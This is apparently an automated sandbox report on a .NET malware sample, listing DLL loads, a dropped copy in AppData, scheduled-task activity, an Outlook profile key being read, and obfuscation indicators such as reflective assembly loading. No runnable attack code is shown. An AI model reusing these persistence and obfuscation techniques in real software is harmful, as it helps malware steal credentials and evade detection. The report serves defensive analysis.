            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: iconcodecservice.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: rasapi32.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: rasman.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: rtutils.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: hcy2SdW2z6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: hcy2SdW2z6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: 0.2.hcy2SdW2z6.exe.7c40000.6.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Na63LTehrWkdCYtgr5.cs.Net Code: vSu9cH6fGwWxvAJQsoH System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 0_2_07C98DF9 pushad ; retf 0_2_07C9901D
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 0_2_07C92BA0 pushfd ; retf 0_2_07C92BA1
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 0_2_07C91AF8 push esp; ret 0_2_07C91AF9
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A12E78 push esp; iretd 8_2_06A12E79
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A16F8B push es; ret 8_2_06A16FE4
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A16F13 push es; ret 8_2_06A16FE4
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A12840 push esp; retf 8_2_06A12AC9
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A1705B push es; iretd 8_2_06A1705C
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_05708E08 pushad ; retf 9_2_0570901D
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_05702BA0 pushfd ; retf 9_2_05702BA1
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_05701AF8 push esp; ret 9_2_05701AF9
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF2E78 push esp; iretd 13_2_04EF2E79
            Source: hcy2SdW2z6.exeStatic PE information: section name: .text entropy: 7.550509177696014
            Source: zZlsXaceOG.exe.0.drStatic PE information: section name: .text entropy: 7.550509177696014
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, DtvJEGtDCEqJNsbGAV.csHigh entropy of concatenated method names: 'AOIkb6sYjE', 'UpikfEFQrd', 'BhdkO9PweH', 'eQ2ksvEWZF', 'e86kQJSPqT', 'LHqkgVZfQI', 'upZkFqQRJu', 'PuYkwPjLpQ', 'V3IkygaKrf', 'MyJkJ3Vsou'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Na63LTehrWkdCYtgr5.csHigh entropy of concatenated method names: 'x4EWBnrhu5', 'n37WAj9y4B', 'zrTWd90bkk', 'AslWKjgadP', 'S0eWiETHh2', 'kXKWGF3xQQ', 'LipWVnm1wg', 'zMlWeQJ1UB', 'r2uWStehJ1', 'exxWXXivlb'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, E2Q8vrKvjyfdYqH0wJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ehcvl0JNr8', 'Qf5v12NDeC', 'eTAvzyUPPG', 'TSRWcruWZI', 'zdXWjjDlm0', 'nq5WvHRP3B', 'NphWWykc9J', 'Ho4Jy169enlSTKxUKYc'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, yOM0bRb7wDu62SICtB.csHigh entropy of concatenated method names: 'PtPdH9pQG9', 'Wrid58bElI', 'IsadYK0xIL', 'vU5dUaN6qO', 'FfMd4td8wi', 'DV3dNk0TtG', 't53dpK1GCS', 'bEddriPJlh', 'YupdlCPyNA', 'Xacd1sNICm'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, QbZ206lF5HGx3YU8j0.csHigh entropy of concatenated method names: 't1F8OBbIYL', 'Emw8s76Hns', 'Sgg8TDy1Pl', 'svy8QOdV3w', 'hic8gWU3VL', 'zlY8afh820', 'h6h8FlvKkY', 'Erg8wpqW3r', 'cL98ZfHxrp', 'rJU8yIqBSh'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, dNS7VLaV4vOLsSxCyY.csHigh entropy of concatenated method names: 'QLoGYMwedH', 'cwvGUAe0ii', 'EuGG4FIeht', 'ToString', 'YZrGNTwJEO', 'LyVGp6DjW2', 'SmHaIyqN5xapoqwP2DF', 'XFNog0qOMk8NPhoafX8', 'OADUZgqutlYuj0h3dD7'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, AofUnnNu99MrCWjtvl.csHigh entropy of concatenated method names: 'VfL9rMpwBm', 'nKV91yOFh7', 'oUkRcuydsW', 'kdqRjJqTe5', 'NYm9JBjJLx', 'MHQ9Cmgc1i', 's1J9tJhpy7', 'oCm9HMHV6V', 'U6E95wr6Uk', 'qAw9YF0eGL'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, GJcAYXY717upsp7s9K.csHigh entropy of concatenated method names: 'ToString', 'cuU7JM1vfB', 'w6R7sA9Xim', 'vLq7Tjq5xT', 'kQY7Qpwt48', 'Pum7gklADt', 'n857axajqA', 'cBd7FrBkcb', 'tDF7w2vL1d', 'C0Z7ZpvGbO'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, StWk4SjjQ3metO1CHxL.csHigh entropy of concatenated method names: 'otih1rSMe0', 'YfkhziRhFo', 'sddEcktL4q', 'nKwEjXUFGN', 'AyDEv68xPV', 'r8SEWE1rkd', 'O1yE6ipFyd', 'zIyEBlLEgx', 'eIdEAd4ZDA', 'Ai1EdbJFXQ'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, EYIgc1fnY0Mlv9844J.csHigh entropy of concatenated method names: 'n80K3a9euN', 'ycPKmBGvau', 'TW3KbkqllK', 'xKoKfOkIkV', 'iqLKxiB0ho', 'qotK7VXVNA', 'BuVK91KG9u', 'PirKR3bMYP', 'AFkK8iP3Sx', 'AuZKhJ0FhB'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, BhRDxR1Ad0eqlMtskb.csHigh entropy of concatenated method names: 'M0whKp73yE', 'zMRhiy9XcO', 'wxGhGlUiYM', 'jRQhVaunkV', 'llVh8o5N5C', 'QvyheVxQ32', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, fYGUFPFRo1KUbruArD.csHigh entropy of concatenated method names: 'M8CVA8fdD0', 'C5SVKCMD1L', 'Tj8VGFGu6I', 'AZNG1OVvmq', 'mUqGzW0HGW', 'UuQVc61bC6', 'RSCVjcdKhF', 'B8WVvnXkHN', 'LklVWhWAbN', 'TgwV6AJp8b'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, gW1pxddDey09baIHSW.csHigh entropy of concatenated method names: 'Dispose', 'eAJjlSplgE', 'A7lvs9yMpl', 'rGbwGjQVHs', 'zGnj1t6TKE', 'CW2jzg0l9U', 'ProcessDialogKey', 'iYHvcbZ206', 'K5HvjGx3YU', 'sj0vvmhRDx'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, AFeIdI6LZTOhlVe84i.csHigh entropy of concatenated method names: 'KnMjVOM0bR', 'pwDjeu62SI', 'YnYjX0Mlv9', 's44jDJ2taK', 'ScfjxiWZt3', 'jbRj7v8E1M', 'oN0xqhdEtMkfoWArHW', 'wJoMbBFZ9T0hUUJ9uG', 'phSjjRycXo', 'MJcjWbsoiv'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Mt3VbROv8E1MeJd1rh.csHigh entropy of concatenated method names: 'e9YGBPd4uY', 'IkrGdLUe1h', 'ERXGiTQFev', 'D9cGVbWN5n', 'L9QGeUOFr5', 'J6Fi4lBkTo', 'xfYiNpDkHt', 'n1oipG52d5', 'Kw9irtgmBp', 'TVDilP9uGF'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, QrRv9BvCEsQxeQSeFN.csHigh entropy of concatenated method names: 'rwxovqg73', 'gae3WY8va', 'Huymd49B3', 'GvxqW5Pk5', 'h2tfGR3uJ', 'IJ3PVn5Cl', 'NF21ovkfKpIYR3fuKn', 'd6gmRUNcTdRGEfjIKH', 'AiLRj6yQM', 'cxWhMl0H1'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, XiNn2Ljc6AoXOHANckF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'J2lhJNbb3m', 'ATYhC1WRhR', 'ud9htlJYoD', 'BiIhHTxWmt', 'NC3h5fFpr2', 'FGchYa0bI2', 'lOKhUU8Q5b'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, Xx74Xhj66hHmPyHIijR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ai8I8QJd2N', 'fbsIh7qSuL', 'l8hIE3loia', 'yDGIIJEuxK', 'itBILIK4ke', 'LHbIn2s8rR', 'fxiIup4CfD'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, brh9Ujpc06AJSplgEo.csHigh entropy of concatenated method names: 'NoO8xPUZf1', 'q7089edIus', 'VNX88X7IEb', 'W1h8ERCMDL', 'pYF8L7WwFa', 'dFC8uG6IiK', 'Dispose', 'bPFRA8OZUV', 'fyGRdKCLOo', 'Nr9RKBqaGF'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, AI7sUBjBoY3LmNFTxde.csHigh entropy of concatenated method names: 'NLCuK3wwh7E8i', 'caEY2FL6PvEq08JslFo', 'CLekG9Lq8dYNqOueHKG', 'frF9vsyzDFidAJUClHX', 'L0EnMbL9rA0jPm42C5P', 'xSM7AhLSUF5NMv0kIag'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, wTwkVUZLO4mIcrHJyq.csHigh entropy of concatenated method names: 'o5RV2RIIVX', 'yumVMRCcrR', 'Iq4VoxgSFL', 'VnCV3PoJla', 'MaVV00eOBd', 'MOLVmUZZWU', 'Nj7VqO13VO', 'Y2GVbjEomM', 'XjpVfKLHBj', 'D5lVPqK2Yu'
